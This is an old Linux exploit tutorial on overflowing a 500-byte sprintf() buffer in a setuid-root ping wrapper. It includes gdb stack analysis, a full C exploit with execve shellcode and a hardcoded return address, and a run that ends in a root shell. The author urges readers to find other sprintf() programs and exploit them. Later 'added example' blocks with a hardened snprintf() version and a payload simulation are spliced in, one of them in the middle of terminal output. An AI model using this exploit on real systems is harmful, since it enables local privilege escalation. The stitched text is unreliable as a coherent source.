===================================================================================
 Title  : Stack Overflow in the sprintf() family of functions
 Author : (Xpl017Elz)
 E-mail : szoahc@hotmail.com
 Home   : http://x82.i21c.net
 Date   : f. 2001/3/02  s. 2001/10/09
===================================================================================

Note: this document was written to help understand how overflow attacks work. If you find something wrong in it, mail szoahc@hotmail.com and it will be corrected.


Stack Overflow in the sprintf() family of functions.

    #include <stdio.h>
    int sprintf(char *buffer, const char *format, ...);

    buffer : the string the formatted result is written to
    format : the format string used for the conversion
    args   : the arguments to be formatted

sprintf() does not print to the screen; it formats its arguments exactly the way printf() does, but stores the result in buffer. That buffer is usually declared with a fixed size, for example:

    char values[100];
    char exec[500];

If sprintf() stores more bytes than the buffer holds, the write runs past the end of the buffer, and that is what lets us take control of the program. In other words, when the data sprintf() is asked to format is longer than the buffer it was given, it becomes a dangerous point in the program. A program that builds a command line with sprintf() typically looks like the source below. Let's look at it.

    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char *argv[])
    {
        char exec[500];                 /* fixed-size command buffer */

        if (argc < 2) {
            printf("\nUse: %s IP address", argv[0]);
            printf("\n ex> %s 127.0.0.1\n\n", argv[0]);
            exit(0);
        }
        /* argv[1] is copied into exec with no length check: the overflow */
        sprintf(exec, "ping -c 5 \"%s\"", argv[1]);
        system(exec);
    }

Compile the program and run it.

    [x82@xpl017elz tmp]$ gcc -o sprintf sprintf.c && ./sprintf

    Use: ./sprintf IP address
     ex> ./sprintf 127.0.0.1

    [x82@xpl017elz tmp]$

As you can see, it is a program that takes an IP address and pings it 5 times.

    [x82@xpl017elz tmp]$ ls -la /bin/ping
    -rwsr-xr-x   1 root     root        18228 Feb 11  2000 /bin/ping*
    [x82@xpl017elz tmp]$ ping -c 5 127.0.0.1
    PING 127.0.0.1 (127.0.0.1) from 127.0.0.1 : 56(84) bytes of data.
    64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.3 ms
    64 bytes from 127.0.0.1: icmp_seq=1 ttl=255 time=0.2 ms
    ...
    --- 127.0.0.1 ping statistics ---
    5 packets transmitted, 5 packets received, 0% packet loss
    round-trip min/avg/max = 0.2/0.2/0.3 ms
    [x82@xpl017elz tmp]$ exit
    exit
    [root@xpl017elz tmp]# chmod 755 /bin/ping
    [root@xpl017elz tmp]# su x82
    [x82@xpl017elz tmp]$ ping -c 5 127.0.0.1
    ping: socket: Operation not permitted
    [x82@xpl017elz tmp]$ exit
    exit
    [root@xpl017elz tmp]# chmod 4755 sprintf
    [root@xpl017elz tmp]# su x82
    [x82@xpl017elz tmp]$ ./sprintf 127.0.0.1
    PING 127.0.0.1 (127.0.0.1) from 127.0.0.1 : 56(84) bytes of data.
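For contrast with the wrapper above, here is the same command builder done with a bounds-checked formatter. This is an added example, not code from the article: the helper names (cmd_bytes_needed, cmd_would_overflow, build_ping_cmd, max_host_len) are mine, the 500-byte buffer and the `ping -c 5 "..."` command line are the article's. main() prints the command instead of calling system() so the demo is harmless to run.

```c
/* Added example (not from the original article): the article's wrapper with
 * sprintf() replaced by a length-checked snprintf(). EXEC_SIZE, the prefix
 * `ping -c 5 "` and the trailing '"' follow the article; helper names are mine. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define EXEC_SIZE 500

/* Bytes sprintf() would store for this host, including the trailing NUL.
 * snprintf(NULL, 0, ...) measures the formatted length without writing. */
size_t cmd_bytes_needed(const char *host)
{
    return (size_t)snprintf(NULL, 0, "ping -c 5 \"%s\"", host) + 1;
}

/* 1 if the article's sprintf(exec, ...) would write past exec[EXEC_SIZE]. */
int cmd_would_overflow(const char *host)
{
    return cmd_bytes_needed(host) > EXEC_SIZE;
}

/* Largest host argument the 500-byte buffer takes: 11 prefix bytes + host + '"' + NUL. */
size_t max_host_len(void)
{
    return EXEC_SIZE - strlen("ping -c 5 \"") - 2;
}

/* Hardened replacement for the article's sprintf() call. snprintf() never
 * writes more than exec_size bytes; a return value >= exec_size means the
 * command was truncated, in which case the buffer is emptied and -1 returned
 * so a half-built command line is never handed to system(). */
int build_ping_cmd(char *exec, size_t exec_size, const char *host)
{
    int n = snprintf(exec, exec_size, "ping -c 5 \"%s\"", host);
    if (n < 0 || (size_t)n >= exec_size) {
        exec[0] = '\0';
        return -1;
    }
    return 0;
}

int main(int argc, char *argv[])
{
    char exec[EXEC_SIZE];

    if (argc < 2) {
        fprintf(stderr, "Use: %s IP address\n", argv[0]);
        return 1;
    }
    if (build_ping_cmd(exec, sizeof exec, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", max_host_len());
        return 1;
    }
    puts(exec);     /* the article calls system(exec) here */
    return 0;
}
```

Run with 487 x's the command still fits exactly (11 + 487 + 1 + 1 = 500 bytes); with 488 or more it is refused instead of spilling onto the saved ebp. The length check only closes the overflow: whatever is passed to system() is still parsed by /bin/sh, so a wrapper like this should really run ping through fork()/execv() with an argv array rather than a shell command string.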
    64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.3 ms
    64 bytes from 127.0.0.1: icmp_seq=1 ttl=255 time=0.1 ms
    ...
    --- 127.0.0.1 ping statistics ---
    5 packets transmitted, 5 packets received, 0% packet loss
    round-trip min/avg/max = 0.1/0.2/0.3 ms
    [x82@xpl017elz tmp]$ ls -la sprintf
    -rwsr-xr-x   1 root     root        12103 Oct 10 19:21 sprintf*
    [x82@xpl017elz tmp]$

/bin/ping is setuid root by default, because an ordinary user cannot open the raw socket it needs. Since setuid binaries are a security risk, some server administrators strip the setuid bit from ping and instead install a small setuid wrapper like the one above, so that ordinary users can still run a ping test. That is the situation we just reproduced: the wrapper runs as root, and we know it builds its command line with sprintf(). Because it calls sprintf() without any length check, let's make use of that ~ :-p First a quick test.

    [x82@xpl017elz tmp]$ ./sprintf `perl -e "print 'x'x500"`
    ping: unknown host xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    Segmentation fault
    [x82@xpl017elz tmp]$

As the source shows, the program reserves 500 bytes for the command string (char exec[500];), and nothing stops argv[1] from being longer than that. So let's exploit it. The shellcode address could be fed in with perl as well, but here we will write the exploit in C. First copy the binary (the copy is not setuid, so it can be run under gdb) and look at the stack.

    [x82@xpl017elz tmp]$ cp sprintf x0x
    [x82@xpl017elz tmp]$ gdb x0x
    ...
    (gdb) break main
    Breakpoint 1 at 0x8048479
    (gdb) r
    Starting program: /var/tmp/x0x

    Breakpoint 1, 0x8048479 in main ()
    (gdb) x/40 $ebp
    0xbffffa18:     0xbffffa38      0x400311fb      0x00000001      0xbffffa64
    0xbffffa28:     0xbffffa6c      0x40012024      0x00000001      0x080483c0
    0xbffffa38:     0x00000000      0x080483e1      0x08048470      0x00000001
    0xbffffa48:     0xbffffa64      0x08048308      0x0804850c      0x4000a600
    0xbffffa58:     0xbffffa5c      0x40012670      0x00000001      0xbffffb5b
    0xbffffa68:     0x00000000      0xbffffb68      0xbffffb82      0xbffffca1
    0xbffffa78:     0xbffffcaf      0xbffffcbd      0xbffffcd4      0xbffffce0
    0xbffffa88:     0xbffffcf2      0xbffffd0c      0xbffffd17      0xbffffd25
    0xbffffa98:     0xbffffd83      0xbffffd8f      0xbffffd9e      0xbffffdb3
    0xbffffaa8:     0xbffffdc3      0xbffffdcc      0xbffffddb      0xbffffdee
    (gdb)

This is the stack at the start of main(). As you can see, the word at $ebp (0xbffffa18) is the saved frame pointer 0xbffffa38, and the word 4 bytes past it, at 0xbffffa1c, is the return address 0x400311fb (back into __libc_start_main). If we overwrite that word with the address of our shellcode, it is game over. :-) Let's verify this once more, in detail.

    (gdb) disass main
    Dump of assembler code for function main:
    0x8048470 <main>:       push   %ebp
    0x8048471 <main+1>:     mov    %esp,%ebp
    0x8048473 <main+3>:     sub    $0x1f4,%esp
    0x8048479 <main+9>:     cmpl   $0x1,0x8(%ebp)
    0x804847d <main+13>:    jg     0x80484b0 <main+64>
    0x804847f <main+15>:    mov    0xc(%ebp),%eax
    0x8048482 <main+18>:    mov    (%eax),%edx
    0x8048484 <main+20>:    push   %edx
    0x8048485 <main+21>:    push   $0x8048530
    0x804848a <main+26>:    call   0x8048388 <printf>
    0x804848f <main+31>:    add    $0x8,%esp
    0x8048492 <main+34>:    mov    0xc(%ebp),%eax
    0x8048495 <main+37>:    mov    (%eax),%edx
    0x8048497 <main+39>:    push   %edx
    0x8048498 <main+40>:    push   $0x8048544
    0x804849d <main+45>:    call   0x8048388 <printf>
    0x80484a2 <main+50>:    add    $0x8,%esp
    0x80484a5 <main+53>:    push   $0x0
    0x80484a7 <main+55>:    call   0x8048398 <exit>
    0x80484ac <main+60>:    add    $0x4,%esp
    0x80484af <main+63>:    nop
    0x80484b0 <main+64>:    mov    0xc(%ebp),%eax
    ---Type <return> to continue, or q <return> to quit---
    0x80484b3 <main+67>:    add    $0x4,%eax
    0x80484b6 <main+70>:    mov    (%eax),%edx
    0x80484b8 <main+72>:    push   %edx
    0x80484b9 <main+73>:    push   $0x8048559
    0x80484be <main+78>:    lea    0xfffffe0c(%ebp),%eax
    0x80484c4 <main+84>:    push   %eax
    0x80484c5 <main+85>:    call   0x80483a8 <sprintf>
    0x80484ca <main+90>:    add    $0xc,%esp
    0x80484cd <main+93>:    lea    0xfffffe0c(%ebp),%eax
    0x80484d3 <main+99>:    push   %eax
    0x80484d4 <main+100>:   call   0x8048358 <system>
    0x80484d9 <main+105>:   add    $0x4,%esp
    0x80484dc <main+108>:   leave
    0x80484dd <main+109>:   ret
    0x80484de <main+110>:   nop
    0x80484df <main+111>:   nop
    End of assembler dump.

sub $0x1f4,%esp reserves exactly the 500 bytes of exec[], and lea 0xfffffe0c(%ebp) (ebp - 0x1f4) is the address handed to sprintf(). So the saved ebp sits right at exec+500 and the return address at exec+504. Break on the ret and run the copy with 492 x's:

    (gdb) break *0x80484dd
    Breakpoint 1 at 0x80484dd
    (gdb) r `perl -e "print 'x'x492"`
    Starting program: /var/tmp/x0x `perl -e "print 'x'x492"`
    ping: socket: Operation not permitted

    Breakpoint 1, 0x80484dd in main ()
    (gdb) info reg
    eax            0x100    256
    ecx            0xbffff374       -1073745036
    edx            0x0      0
    ebx            0x40107bec       1074822124
    esp            0xbffff81c       -1073743844
    ebp            0x22787878       578320504
    esi            0x4000a600       1073784320
    edi            0xbffff864       -1073743772
    eip            0x80484dd        134513885
    eflags         0x286    646
    cs             0x23     35
    ss             0x2b     43
    ds             0x2b     43
    es             0x2b     43
    fs             0x0      0
    gs             0x0      0
    cwd            0xffff037f       -64641
    swd            0xffff0000       -65536
    twd            0xffffffff       -1
    fip            0x4004c4e4       1074054372
    fcs            0x77d0023        125632547
    fopo           0xbffff938       -1073743560
    fos            0xffff002b       -65493
    (gdb) c
    Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    0x4003110e in __libc_start_main (main=Cannot access memory at address 0x22787880
    ) at ../sysdeps/generic/libc-start.c:41
    41      ../sysdeps/generic/libc-start.c: No such file or directory.
    (gdb) c
    Continuing.

    Program terminated with signal SIGSEGV, Segmentation fault.
    The program no longer exists.
    (gdb)

Here is what happened. The prefix "ping -c 5 \"" is 11 bytes, so argv[1] starts at exec[11], and only 487 bytes of it fit in the buffer together with the closing quote and the NUL. With 492 x's the formatted string is 505 bytes long: exec[500..502] receive 'x' (0x78), exec[503] receives the closing quote (0x22), so the saved ebp becomes 0x22787878, and the terminating NUL lands on the low byte of the return address, turning 0x400311fb into 0x40031100. main() therefore returns a few bytes early into __libc_start_main, with a garbage frame pointer, and the program dies at 0x4003110e.

    (gdb) x/10 $ebp
    0x22787878:     Cannot access memory at address 0x22787878

The overwritten ebp is 0x22787878: three of our x's followed by the closing '"' (0x22), with the NUL (0x00) right behind it. That is why the segmentation fault shows up at exactly 492 characters.

Now the exploit itself. What we need is an address inside our own input. The ebp we just clobbered tells us where the frame was: at the ret breakpoint esp was 0xbffff81c, so ebp was 0xbffff818, and that is where the saved ebp lives; the return address sits at 0xbffff81c. Since the buffer starts 500 bytes below ebp, an address 450 bytes (0x1c2) below ebp is well inside it, and as long as that spot is covered by NOPs (0x90) execution slides into the shellcode: 0xbffff818 - 0x1c2 = 0xbffff656. So 0xbffff656 is the address we will write over the return address, and the NOP sled has to cover it.

Layout of the overwrite:

    NOP       = 250 bytes
    shellcode =  24 bytes
    etcvalues = 219 bytes
    ---------------------
                493 bytes, followed by the 4-byte return address (497 bytes of argv[1])

    [x82@xpl017elz tmp]$ cat expl.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    char shellcode[] =
        "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
        "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";      /* 24 bytes: execve("//bin/sh") */

    int main()
    {
        int  a_xox, b_xox, c_xox;
        char x_xox[1500];

        memset(x_xox, 0, sizeof x_xox);

        /* 250 NOPs: sizeof(shellcode) is 25 (24 bytes + NUL), so this runs a_xox = 0..249 */
        for (a_xox = 0; a_xox <= (274 - sizeof(shellcode)); a_xox++) {
            x_xox[a_xox] = 0x90;                 /* NOP */
        }
        /* 24 shellcode bytes at offsets 250..273 */
        for (b_xox = 0; b_xox < (sizeof(shellcode) - 1); a_xox++, b_xox++) {
            x_xox[a_xox] = shellcode[b_xox];     /* shellcode */
        }
        /* 219 filler bytes at offsets 274..492; the last four land on the saved ebp */
        for (c_xox = 0; c_xox <= 218; c_xox++) {
            x_xox[a_xox++] = 0x20;               /* etcvalues */
        }
        /* Return address 0xbffff656, little-endian, at offsets 493..496 */
        x_xox[a_xox++] = 0x56;
        x_xox[a_xox++] = 0xf6;
        x_xox[a_xox++] = 0xff;
        x_xox[a_xox++] = 0xbf;

        execl("./sprintf", "sprintf", x_xox, NULL);
        perror("\n");
        exit(0);
    }
    [x82@xpl017elz tmp]$ gcc -o expl expl.c
    [x82@xpl017elz tmp]$ ./expl
    ping: unknown host B? V
    bash#

Oops~! :-) We got a root shell. Let's look at how the exploit sits in memory at that moment.

    0xbffff624  70 69 6e 67 20 2d 63 20 35 20 22 90 90 90 90 90   ping -c 5 ".....   <- "ping -c 5 \"" prefix, then the NOPs begin
    0xbffff634  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff644  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff654  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
                  ^^ 0xbffff656: the address the return address now points to, inside the NOP sled
    0xbffff664  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff674  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff684  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff694  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff6a4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff6b4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff6c4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff6d4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff6e4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff6f4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff704  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff714  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    0xbffff724  90 90 90 90 90 31 d2 52 68 6e 2f 73 68 68 2f 2f   .....1.Rhn/shh//   <- last NOPs; shellcode starts at 0xbffff729
    0xbffff734  62 69 89 e3 52 53 89 e1 8d 42 0b cd 80 20 20 20   bi..RS...B...      <- end of shellcode; filler (etcvalues) begins
    0xbffff744  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff754  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff764  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff774  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff784  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff794  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff7a4  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff7b4  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff7c4  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff7d4  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff7e4  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff7f4  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff804  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    0xbffff814  20 20 20 20 20 20 20 20 56 f6 ff bf 22 00 00 00           v..."...   <- filler up to the saved ebp (0xbffff818), the return address 0xbffff656 at 0xbffff81c, then the closing '"' and NUL (0x00000022)
    0xbffff824  04 f8 ff bf 10 f8 ff bf 24 20 01 40 02 00 00 00   ........$ .@....
    0xbffff834  f0 83 04 08 00 00 00 00 11 84 04 08 84 86 04 08   ................
    0xbffff844  02 00 00 00 04 f8 ff bf 2c 83 04 08 3c 87 04 08   ........,...<...
    0xbffff854  00 a6 00 40 fc f7 ff bf 70 26 01 40 02 00 00 00   ...@....p&.@....
    0xbffff864  19 f9 ff bf 1c f9 ff bf 00 00 00 00 0e fb ff bf   ................
    0xbffff874  28 fb ff bf 47 fc ff bf                           (...G...

That is how the shellcode ended up in memory. Unlike the scanf() case, whitespace in the input does not cut the code off here, which is why the exploit could be built this way (the filler bytes are plain spaces, 0x20). Readers should look for other programs that use sprintf() and try to exploit them.

    bash# strings /bin/* | grep sprintf | more
    sprintf
    sprintf
    sprintf
    vsprintf
    sprintf
    vsprintf
    sprintf
    sprintf
    sprintf
    ...
    sprintf
    sprintf
    sprintf
    sprintf
    vsprintf
    sprintf
    sprintf
    vsprintf
    sprintf
    sprintf
    bash#

(strings only shows that the name appears in the binary, normally in its dynamic symbol table; it says nothing about whether the call is actually unbounded, so each hit still has to be checked.) Of course, exploiting a program that is not setuid does not get you a privileged shell, so test this in an environment where it makes sense. :-p And finding a program written carelessly enough is not that easy. :-(
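The frame arithmetic the gdb session and the memory dump above rely on (prefix of 11 bytes, saved ebp at exec+500, return address at exec+504) can be checked without a 2001-era box. The block below is an added example, not code from the article: it lays out a flat byte array as main()'s frame, formats the article's `ping -c 5 "<arg>"` string into it with memcpy so the overrun stays inside the array, and reads back the words that follow the 500-byte buffer. The pre-overflow values 0xbffff818 / 0x400311fb, the shellcode bytes and the 250/24/219 payload layout are the article's; the function and struct names (simulate_overflow, build_payload, frame_result) are mine, and the untouched part of the frame is zero-filled, an assumption made so the word after the return address matches the dump. Nothing here executes the shellcode.

```c
/* Added example (not from the original article): byte-level simulation of the
 * article's stack frame. FRAME stands in for main()'s stack: exec[0..499],
 * the saved ebp at offset 500, the return address at 504 (sub $0x1f4,%esp
 * puts exec at ebp-500). Constants are the article's observed values. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <inttypes.h>

#define EXEC_SIZE   500
#define FRAME_SIZE  1024
#define SAVED_EBP   0xbffff818u   /* ebp at the ret breakpoint (esp was 0xbffff81c) */
#define RET_ADDR    0x400311fbu   /* return into __libc_start_main */

static const unsigned char shellcode[] =
    "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
    "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";        /* 24 bytes: execve("//bin/sh") */

struct frame_result {
    uint32_t saved_ebp;   /* word at exec+500 after the overflow */
    uint32_t ret;         /* word at exec+504 */
    uint32_t after_ret;   /* word at exec+508: where the closing '"' and NUL land */
    size_t   written;     /* bytes sprintf() would have stored, NUL included */
};

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)v;        p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

/* Store the bytes sprintf(exec, "ping -c 5 \"%s\"", arg) would store into a
 * simulated frame and read back the words past the buffer. arg may not contain
 * NUL bytes (argv cannot carry them either). Returns 0, or -1 if the string
 * would run off the end of the simulated frame (assumed 1024 bytes). */
int simulate_overflow(const unsigned char *arg, size_t arg_len, struct frame_result *r)
{
    unsigned char frame[FRAME_SIZE];
    size_t prefix = strlen("ping -c 5 \"");
    size_t need = prefix + arg_len + 2;             /* closing quote + NUL */
    if (need > FRAME_SIZE) return -1;

    memset(frame, 0, sizeof frame);                 /* assumption: untouched stack is zero */
    put_le32(frame + EXEC_SIZE, SAVED_EBP);
    put_le32(frame + EXEC_SIZE + 4, RET_ADDR);

    memcpy(frame, "ping -c 5 \"", prefix);
    memcpy(frame + prefix, arg, arg_len);
    frame[prefix + arg_len] = '"';
    frame[prefix + arg_len + 1] = '\0';

    r->saved_ebp = le32(frame + EXEC_SIZE);
    r->ret       = le32(frame + EXEC_SIZE + 4);
    r->after_ret = le32(frame + EXEC_SIZE + 8);
    r->written   = need;
    return 0;
}

/* The article's expl.c payload: 250 NOPs, 24 shellcode bytes, 219 spaces, then
 * ret_addr little-endian. Returns the payload length (497). out needs 497 bytes. */
size_t build_payload(unsigned char *out, uint32_t ret_addr)
{
    size_t n = 0;
    memset(out + n, 0x90, 250);                        n += 250;
    memcpy(out + n, shellcode, sizeof shellcode - 1);  n += sizeof shellcode - 1;
    memset(out + n, 0x20, 219);                        n += 219;
    put_le32(out + n, ret_addr);                       n += 4;
    return n;
}

int main(void)
{
    unsigned char arg[600];
    struct frame_result r;

    memset(arg, 'x', 492);                          /* the article's gdb run */
    simulate_overflow(arg, 492, &r);
    printf("492 x's : ebp=%#" PRIx32 " ret=%#" PRIx32 "\n", r.saved_ebp, r.ret);

    size_t n = build_payload(arg, 0xbffff656u);     /* the article's exploit */
    simulate_overflow(arg, n, &r);
    printf("exploit : ebp=%#" PRIx32 " ret=%#" PRIx32 " next=%#" PRIx32 "\n",
           r.saved_ebp, r.ret, r.after_ret);
    return 0;
}
```

With 492 x's the simulation reproduces the gdb output (ebp 0x22787878, return address 0x40031100); with the expl.c payload it reproduces the dump (ebp 0x20202020, return address 0xbffff656, then 0x00000022). The same routine shows that 487 x's is the longest argument that leaves both saved words intact.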